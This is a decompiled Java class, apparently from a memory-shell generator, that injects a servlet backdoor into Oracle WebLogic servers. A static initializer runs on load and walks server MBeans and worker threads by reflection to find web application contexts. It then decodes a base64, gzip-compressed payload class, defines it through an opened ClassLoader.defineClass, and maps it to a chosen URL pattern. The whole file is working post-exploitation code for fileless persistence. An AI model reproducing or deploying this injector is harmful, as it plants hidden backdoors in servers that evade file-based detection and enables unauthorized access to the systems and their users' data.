package com.reajason.javaweb.memshell.injector.weblogic;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Iterator;
import java.util.Map;
import java.util.Set;
import java.util.zip.GZIPInputStream;
import javax.servlet.Servlet;

/* loaded from: input_file:com/reajason/javaweb/memshell/injector/weblogic/WebLogicServletInjector.class */
public class WebLogicServletInjector {
    public String getUrlPattern() {
        return "{{urlPattern}}";
    }

    public String getClassName() {
        return "{{className}}";
    }

    public String getBase64String() throws IOException {
        return "{{base64Str}}";
    }

    public WebLogicServletInjector() {
        try {
            for (Object obj : getContext()) {
                inject(obj, getShell(obj));
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static Object[] getContextsByMbean() throws Throwable {
        HashSet hashSet = new HashSet();
        Class<?> cls = Class.forName("weblogic.t3.srvr.ServerRuntime");
        Class<?> cls2 = Class.forName("weblogic.servlet.internal.WebAppServletContext");
        Method method = cls.getMethod("theOne", new Class[0]);
        method.setAccessible(true);
        Object invoke = method.invoke(null, new Object[0]);
        Method method2 = invoke.getClass().getMethod("getApplicationRuntimes", new Class[0]);
        method2.setAccessible(true);
        Object invoke2 = method2.invoke(invoke, new Object[0]);
        int length = Array.getLength(invoke2);
        for (int i = 0; i < length; i++) {
            Object obj = Array.get(invoke2, i);
            try {
                Object invoke3 = obj.getClass().getMethod("getComponentRuntimes", new Class[0]).invoke(obj, new Object[0]);
                int length2 = Array.getLength(invoke3);
                for (int i2 = 0; i2 < length2; i2++) {
                    Object fieldValue = getFieldValue(Array.get(invoke3, i2), "context");
                    if (cls2.isInstance(fieldValue)) {
                        hashSet.add(fieldValue);
                    }
                }
            } catch (Throwable th) {
            }
            try {
                Iterator it = ((Set) getFieldValue(obj, "children")).iterator();
                while (it.hasNext()) {
                    try {
                        Object fieldValue2 = getFieldValue(it.next(), "context");
                        if (cls2.isInstance(fieldValue2)) {
                            hashSet.add(fieldValue2);
                        }
                    } catch (Throwable th2) {
                    }
                }
            } catch (Throwable th3) {
            }
        }
        return hashSet.toArray();
    }

    public static Object[] getContextsByThreads() throws Throwable {
        Object fieldValue;
        Object fieldValue2;
        HashSet hashSet = new HashSet();
        ThreadGroup threadGroup = Thread.currentThread().getThreadGroup();
        int activeCount = threadGroup.activeCount();
        Thread[] threadArr = new Thread[activeCount];
        threadGroup.enumerate(threadArr);
        for (int i = 0; i < activeCount; i++) {
            Thread thread = threadArr[i];
            if (thread != null && (fieldValue = getFieldValue(thread, "workEntry")) != null) {
                try {
                    Object obj = null;
                    Object fieldValue3 = getFieldValue(fieldValue, "connectionHandler");
                    if (fieldValue3 != null && (fieldValue2 = getFieldValue(fieldValue3, "request")) != null) {
                        obj = getFieldValue(fieldValue2, "context");
                    }
                    if (obj == null) {
                        obj = getFieldValue(fieldValue, "context");
                    }
                    if (obj != null) {
                        hashSet.add(obj);
                    }
                } catch (Throwable th) {
                }
            }
        }
        return hashSet.toArray();
    }

    public static Object[] getContext() {
        HashSet hashSet = new HashSet();
        try {
            hashSet.addAll(Arrays.asList(getContextsByMbean()));
        } catch (Throwable th) {
        }
        try {
            hashSet.addAll(Arrays.asList(getContextsByThreads()));
        } catch (Throwable th2) {
        }
        return hashSet.toArray();
    }

    private Object getShell(Object obj) throws Exception {
        ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader();
        if (contextClassLoader == null) {
            contextClassLoader = obj.getClass().getClassLoader();
        }
        try {
            return contextClassLoader.loadClass(getClassName()).newInstance();
        } catch (Exception e) {
            byte[] gzipDecompress = gzipDecompress(decodeBase64(getBase64String()));
            Method declaredMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
            declaredMethod.setAccessible(true);
            return ((Class) declaredMethod.invoke(contextClassLoader, gzipDecompress, 0, Integer.valueOf(gzipDecompress.length))).newInstance();
        }
    }

    public void inject(Object obj, Object obj2) throws Exception {
        Object newInstance;
        Object invokeMethod = invokeMethod(obj, "getServletMapping", null, null);
        Class<?> cls = Class.forName("weblogic.servlet.internal.WebAppServletContext");
        Class<?> cls2 = Class.forName("weblogic.servlet.internal.ServletStubImpl");
        try {
            Constructor<?> declaredConstructor = cls2.getDeclaredConstructor(String.class, Servlet.class, cls);
            declaredConstructor.setAccessible(true);
            newInstance = declaredConstructor.newInstance(getClassName(), obj2, obj);
        } catch (NoSuchMethodException e) {
            Constructor<?> declaredConstructor2 = cls2.getDeclaredConstructor(String.class, String.class, cls, Map.class);
            declaredConstructor2.setAccessible(true);
            newInstance = declaredConstructor2.newInstance(getClassName(), getClassName(), obj, null);
        }
        Constructor<?> declaredConstructor3 = Class.forName("weblogic.servlet.internal.URLMatchHelper").getDeclaredConstructor(String.class, cls2);
        declaredConstructor3.setAccessible(true);
        Object newInstance2 = declaredConstructor3.newInstance(getUrlPattern(), newInstance);
        if (invokeMethod(invokeMethod, "get", new Class[]{String.class}, new Object[]{getUrlPattern()}) != null) {
            System.out.println("servlet already injected");
        } else {
            invokeMethod(invokeMethod, "put", new Class[]{String.class, Object.class}, new Object[]{getUrlPattern(), newInstance2});
            System.out.println("servlet inject successful");
        }
    }

    public static byte[] decodeBase64(String str) throws Exception {
        try {
            Object invoke = Class.forName("java.util.Base64").getMethod("getDecoder", new Class[0]).invoke(null, new Object[0]);
            return (byte[]) invoke.getClass().getMethod("decode", String.class).invoke(invoke, str);
        } catch (Exception e) {
            Class<?> cls = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) cls.getMethod("decodeBuffer", String.class).invoke(cls.newInstance(), str);
        }
    }

    public static byte[] gzipDecompress(byte[] bArr) throws IOException {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        GZIPInputStream gZIPInputStream = null;
        try {
            gZIPInputStream = new GZIPInputStream(new ByteArrayInputStream(bArr));
            byte[] bArr2 = new byte[4096];
            while (true) {
                int read = gZIPInputStream.read(bArr2);
                if (read <= 0) {
                    break;
                }
                byteArrayOutputStream.write(bArr2, 0, read);
            }
            byte[] byteArray = byteArrayOutputStream.toByteArray();
            if (gZIPInputStream != null) {
                gZIPInputStream.close();
            }
            byteArrayOutputStream.close();
            return byteArray;
        } catch (Throwable th) {
            if (gZIPInputStream != null) {
                gZIPInputStream.close();
            }
            byteArrayOutputStream.close();
            throw th;
        }
    }

    public static Object invokeMethod(Object obj, String str, Class<?>[] clsArr, Object[] objArr) throws Exception {
        Method declaredMethod = obj.getClass().getDeclaredMethod(str, clsArr);
        declaredMethod.setAccessible(true);
        return declaredMethod.invoke(obj, objArr);
    }

    public static Object getFieldValue(Object obj, String str) throws NoSuchFieldException, IllegalAccessException {
        Class<?> cls = obj.getClass();
        while (true) {
            Class<?> cls2 = cls;
            if (cls2 == Object.class) {
                throw new NoSuchFieldException(str);
            }
            try {
                Field declaredField = cls2.getDeclaredField(str);
                declaredField.setAccessible(true);
                return declaredField.get(obj);
            } catch (NoSuchFieldException e) {
                cls = cls2.getSuperclass();
            }
        }
    }

    static {
        new WebLogicServletInjector();
    }
}
